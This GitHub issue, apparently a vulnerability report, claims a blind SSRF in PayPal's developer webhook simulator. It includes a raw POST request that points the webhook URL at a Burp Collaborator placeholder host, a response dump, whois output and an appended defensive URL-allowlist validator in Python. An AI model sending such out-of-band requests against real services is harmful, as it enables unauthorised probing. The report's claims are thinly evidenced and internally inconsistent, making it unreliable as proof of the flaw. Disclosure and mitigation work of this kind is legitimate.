
Blind SSRF due to lack of access controls via /v1/billing/plans Endpoint. #277

Open
imhunterand opened this issue Jul 24, 2022 · 0 comments

@imhunterand

Describe the bug
Web applications hosted on the "developer.paypal.com" domain are affected by a Server Side Request Forgery (SSRF) vulnerability that could allow an attacker to force an application to make requests to arbitrary targets. An attacker can insert malicious code injection via the "simulator webhooks api" parameter at the directory "https://developer.paypal.com/developer/webhooksSimulator". The vulnerability that I found is an SSRF vulnerability in the "Base API URL" form field: I insert the SSRF code, which is sent by the server developer.paypal.com via a request parameter, and the results show that these parameters are vulnerable to malicious SSRF attacks.

To Reproduce

  • Log in to your PayPal account
  • Visit the page https://developer.paypal.com/developer/webhooksSimulator
  • Add a new webhook simulator URL
  • Set up the payload in the simulator URL so that it points to an app under your control (e.g. http://<burpcollaborate-server.sh>/$id)
  • Send the request with the following contents:
POST /developer/webhooksSimulator/testWebhook HTTP/2
Host: developer.paypal.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Ch-Ua-Mobile: ?0
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Transfer-Encoding: chunked

url=http://<burpcollaborate-server.sh>/&event_type=BILLING.PLAN.ACTIVATED&api_version=2.0&_csrf=tX9SyVRmkqk%2FX6lYe%2BsIZIpSz8WNe%2FYpZXXY0%3D
  • The server responds with a 200 Found response that redirects back to the internal network using the Location webhooks:
{
    "msg": "{\n  \"id\": \"WH-55TG7562XN2588878-8YH955435R661687G\",\n  \"create_time\": \"2018-19-12T22:20:32.000Z\",\n  \"resource_type\": \"plan\",\n  \"event_type\": \"BILLING.PLAN.ACTIVATED\",\n  \"summary\": \"A billing plan was activated.\",\n  \"resource\": {\n    \"update_time\": \"2018-12-10T21:20:49Z\",\n    \"create_time\": \"2018-12-10T21:20:49Z\",\n    \"usage_type\": \"LICENSED\",\n    \"payment_preferences\": {\n      \"service_type\": \"PREPAID\",\n      \"auto_bill_outstanding\": true,\n      \"setup_fee\": {\n        \"value\": \"10\",\n        \"currency_code\": \"USD\"\n      },\n      \"setup_fee_failure_action\": \"CONTINUE\",\n      \"payment_failure_threshold\": 3\n    },\n    \"product_id\": \"PROD-XXCD1234QWER65782\",\n    \"name\": \"Zoho Marketing Campaign  Plan\",\n    \"billing_cycles\": [\n      {\n        \"frequency\": {\n          \"interval_unit\": \"MONTH\",\n          \"interval_count\": 1\n        },\n        \"tenure_type\": \"TRIAL\",\n        \"sequence\": 1,\n        \"total_cycles\": 1,\n        \"pricing_scheme\": {\n          \"fixed_price\": {\n            \"value\": \"50\",\n            \"currency_code\": \"USD\"\n          },\n          \"tier_mode\": \"VOLUME\",\n          \"tiers\": [\n            {\n              \"starting_quantity\": \"1\",\n              \"ending_quantity\": \"1000\",\n              \"amount\": {\n                \"value\": \"100\",\n                \"currency_code\": \"USD\"\n              }\n            },\n            {\n              \"starting_quantity\": \"1001\",\n              \"amount\": {\n                \"value\": \"200\",\n                \"currency_code\": \"USD\"\n              }\n            }\n          ]\n        }\n      },\n      {\n        \"frequency\": {\n          \"interval_unit\": \"MONTH\",\n          \"interval_count\": 1\n        },\n        \"tenure_type\": \"REGULAR\",\n        \"sequence\": 2,\n        \"total_cycles\": 12,\n        \"pricing_scheme\": {\n          \"fixed_price\": {\n            \"value\": \"100\",\n            \"currency_code\": \"USD\"\n          },\n          \"tier_mode\": \"VOLUME\",\n          \"tiers\": [\n            {\n              \"starting_quantity\": \"1\",\n              \"ending_quantity\": \"1000\",\n              \"amount\": {\n                \"value\": \"300\",\n                \"currency_code\": \"USD\"\n              }\n            },\n            {\n              \"starting_quantity\": \"1001\",\n              \"amount\": {\n                \"value\": \"1000\",\n                \"currency_code\": \"USD\"\n              }\n            }\n          ]\n        }\n      }\n    ],\n    \"description\": \"Zoho Marketing Campaign Plan\",\n    \"taxes\": {\n      \"percentage\": \"10\",\n      \"inclusive\": false\n    },\n    \"links\": [\n      {\n        \"href\": \"https://api.paypal.com/v1/billing/plans/P-5ML4271244454362WXNWU5NQ\",\n        \"rel\": \"self\",\n        \"method\": \"GET\"\n      },\n      {\n        \"href\": \"https://api.paypal.com/v1/billing/plans/P-5ML4271244454362WXNWU5NQ\",\n        \"rel\": \"edit\",\n        \"method\": \"PATCH\"\n      }\n    ],\n    \"id\": \"P-7GL4271244454362WXNWU5NQ\",\n    \"status\": \"ACTIVE\"\n  },\n  \"links\": [\n    {\n      \"href\": \"https://api.paypal.com/v1/notifications/webhooks-events/WH-55TG7562XN2588878-8YH955435R661687G\",\n      \"rel\": \"self\",\n      \"method\": \"GET\",\n      \"encType\": \"application/json\"\n    },\n    {\n      \"href\": \"https://api.paypal.com/v1/notifications/webhooks-events/WH-55TG7562XN2588878-8YH955435R661687G/resend\",\n      \"rel\": \"resend\",\n      \"method\": \"POST\",\n      \"encType\": \"application/json\"\n    }\n  ],\n  \"event_version\": \"1.0\",\n  \"resource_version\": \"2.0\"\n}",
    "sys": {
        "links": {
            "jsBaseUrl": "https://www.paypalobjects.com/web/res/73e/1ed92776d5cffb6e95c7d692afc06/js",
            "cssBaseUrl": "https://www.paypalobjects.com/web/res/73e/1ed92776d5cffb6e95c7d692afc06/css",
            "templateBaseUrl": "/developer/templates/US/en",
            "resourceBaseUrl": "https://www.paypalobjects.com/web/res/73e/1ed92776d5cffb6e95c7d692afc06",
            "originalTemplateBaseUrl": "https://www.paypalobjects.com/web/res/73e/1ed92776d5cffb6e95c7d692afc06/templates"
        },
        "pageInfo": {
            "date": "Jul 24, 2022 09:42:23 -07:00",
            "hostName": "rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ0LAAtHZbcxVKrr1IEXqHCc9RJfEB9tWaV",
            "rlogId": "rZJvnqaaQhLn%2FnmWT8cSUoqGMZoNnLVa4RXTPX0ZBY504N5%2FhqeuQ2Kujhb8lkvTuyYXEkiodA3CKv7HeUfh7Q_1823116a39d",
            "script": "node",
            "debug": null
        },
        "locality": {
            "timezone": {
                "determiner": "viaUserProfile",
                "value": "Asia/Manila"
            },
            "country": "PH",
            "locale": "en_US",
            "language": "en",
            "directionality": "ltr"
        },
        "tracking": {
            "fpti": {
                "name": "pta",
                "jsURL": "https://www.paypalobjects.com",
                "serverURL": "https://t.paypal.com/ts",
                "dataString": "pgrp=main%3Adeveloper%3Adashboard%3AwebhooksSimulator%3AtestWebhook&page=main%3Adeveloper%3Adashboard%3AwebhooksSimulator%3AtestWebhook&pgst=1658680943517&calc=72de08af65101&nsid=6sMG7cTHhYsi3_VoEQWLJkxgRoxnq2Ke&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=PH&csci=e8ba58b70f164b339db342c10e2aa741&comp=developernodeweb&tsrce=developernodeweb&cu=1&gacook=1047388967.1657043574&c_prefs=T%3D1%2CP%3D1%2CF%3D1%2Ctype%3Dexplicit_banner&cust=TVY9966UVD7QY&party_id=TVY9966UVD7QY&acnt=premier&aver=unverified&rstr=unrestricted&cnac=PH&xe=100963%2C101765%2C104105%2C104539%2C104156%2C104751%2C105045%2C105268%2C105174%2C105464&xt=104129%2C106024%2C116994%2C119781%2C117409%2C121284%2C122170%2C123238%2C123360%2C124179&eccd=&event_category=&lgin=in&fltp=developer_portal_flow&weblls_enabled=false"
            }
        }
    }
}

Whois endpoint

root@defcon-exploit: ~ whois 173.0.81.140

NetRange:       173.0.80.0 - 173.0.95.255
CIDR:           173.0.80.0/20
NetName:        PAYPAL-SITE
NetHandle:      NET-173-0-80-0-1
Parent:         NET173 (NET-173-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS17012
Organization:   PayPal, Inc. (PAYPAL)
RegDate:        2010-06-22
Updated:        2021-12-14
Ref:            https://rdap.arin.net/registry/ip/173.0.80.0


OrgName:        PayPal, Inc.
OrgId:          PAYPAL
Address:        2211 N. First St.
City:           San Jose
StateProv:      CA
PostalCode:     95131
Country:        US
RegDate:        2001-08-17
Updated:        2019-04-10
Ref:            https://rdap.arin.net/registry/entity/PAYPAL


OrgTechHandle: PAYPA-ARIN
OrgTechName:   PayPal Network
OrgTechPhone:  +1-408-967-5100
OrgTechEmail:  [email protected]
OrgTechRef:    https://rdap.arin.net/registry/entity/PAYPA-ARIN

OrgAbuseHandle: NETWO8902-ARIN
OrgAbuseName:   Network Abuse
OrgAbusePhone:  +1-480-967-5100
OrgAbuseEmail:  [email protected]
OrgAbuseRef:    https://rdap.arin.net/registry/entity/NETWO8902-ARIN

RAbuseHandle: NETWO8902-ARIN
RAbuseName:   Network Abuse
RAbusePhone:  +1-480-967-5100
RAbuseEmail:  [email protected]
RAbuseRef:    https://rdap.arin.net/registry/entity/NETWO8902-ARIN

RNOCHandle: PAYPA1-ARIN
RNOCName:   PayPal
RNOCPhone:  +1-480-967-5100
RNOCEmail:  [email protected]
RNOCRef:    https://rdap.arin.net/registry/entity/PAYPA1-ARIN

RTechHandle: PAYPA1-ARIN
RTechName:   PayPal
RTechPhone:  +1-480-967-5100
RTechEmail:  [email protected]
RTechRef:    https://rdap.arin.net/registry/entity/PAYPA1-ARIN

Screenshots/Videos

VIDEOS

Potential fix
To prevent SSRF vulnerabilities in your web applications, it is strongly advised to use a whitelist of allowed domains and protocols from which the web server can fetch remote resources. If possible, avoid using user input directly in functions that can make requests on behalf of the server.

Impact
A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. SSRF is a dangerous web vulnerability caused by bad programming. SSRF lets attackers send requests from the server to other resources, both internal and external, and receive responses.
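One way to implement the allowlist of protocols and domains described under "Potential fix", as an added example that is not part of this report or of the application it describes. It validates a user-supplied webhook URL once, before any request is made: scheme and port allowlist, no userinfo, hostname allowlist, and a check that every address the hostname resolves to is publicly routable (so an allowlisted name cannot point at the internal network). The hostnames, allowlist and resolver table are constructed for the offline demo; the only real address used is 173.0.81.140 from the whois output above. The resolver is injectable so the demo and tests run without DNS.

```python
"""Allowlist-based validation for user-supplied webhook URLs (added example)."""
import ipaddress
import socket
from typing import Callable, Iterable, Optional, Set
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}   # protocol allowlist
ALLOWED_PORTS = {None, 443}   # None means the scheme's default port


def resolve_all(hostname: str) -> Set[str]:
    """Default resolver: every A/AAAA address the hostname maps to."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(hostname, None)}
    except socket.gaierror:
        return set()


def is_public_address(addr: str) -> bool:
    """True only for a globally routable unicast address.

    IPv4-mapped IPv6 (::ffff:a.b.c.d) is unwrapped first so it cannot be
    used to smuggle a private IPv4 address past the check.
    """
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def check_webhook_url(url: str, allowed_hosts: Iterable[str],
                      resolve: Callable[[str], Set[str]] = resolve_all) -> Optional[str]:
    """Return None if the URL may be fetched, otherwise the reason it was rejected."""
    try:
        parts = urlsplit(url)
        port = parts.port                  # raises ValueError on a malformed port
    except ValueError as exc:
        return f"malformed URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return "userinfo (user:pass@) is not allowed"
    host = parts.hostname                  # lower-cased, IPv6 brackets stripped
    if not host:
        return "missing host"
    if port not in ALLOWED_PORTS:
        return f"port not allowed: {port}"
    if host not in {h.lower() for h in allowed_hosts}:
        return f"host not on allowlist: {host!r}"
    addresses = resolve(host)
    if not addresses:
        return f"host does not resolve: {host!r}"
    internal = sorted(a for a in addresses if not is_public_address(a))
    if internal:
        return f"host resolves to non-public address(es): {internal}"
    return None


def validate_webhook_url(url: str, allowed_hosts: Iterable[str],
                         resolve: Callable[[str], Set[str]] = resolve_all) -> str:
    """Raise ValueError for a rejected URL; return the normalised URL otherwise."""
    reason = check_webhook_url(url, allowed_hosts, resolve)
    if reason is not None:
        raise ValueError(reason)
    return urlsplit(url).geturl()


# Constructed sample data so the demo runs offline: hostnames (hypothetical) and
# the addresses they "resolve" to. 173.0.81.140 is the PayPal-registered address
# from the whois output in the report; 10.0.0.5 stands in for an internal host.
SAMPLE_DNS = {
    "hooks.partner.example": {"173.0.81.140"},
    "rebind.partner.example": {"173.0.81.140", "10.0.0.5"},
}
SAMPLE_ALLOWLIST = {"hooks.partner.example", "rebind.partner.example"}


def sample_resolver(hostname: str) -> Set[str]:
    return SAMPLE_DNS.get(hostname, set())


if __name__ == "__main__":
    for candidate in [
        "https://hooks.partner.example/paypal/webhook",   # accepted
        "http://hooks.partner.example/paypal/webhook",    # wrong scheme
        "https://hooks.partner.example@127.0.0.1/",       # userinfo hides the real host
        "https://10.0.0.5/",                              # not on the allowlist
        "https://rebind.partner.example/",                # allowlisted but resolves internally
    ]:
        print(candidate, "->", check_webhook_url(candidate, SAMPLE_ALLOWLIST, sample_resolver) or "OK")
```

The report also notes that the response can redirect back to the internal network via a Location header, so the HTTP client that delivers the webhook must be configured not to follow redirects automatically; any Location it receives is passed through check_webhook_url again before a second request is made. Because DNS can change between validation and connection, production code should additionally connect to the address that was validated rather than resolving the name a second time.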
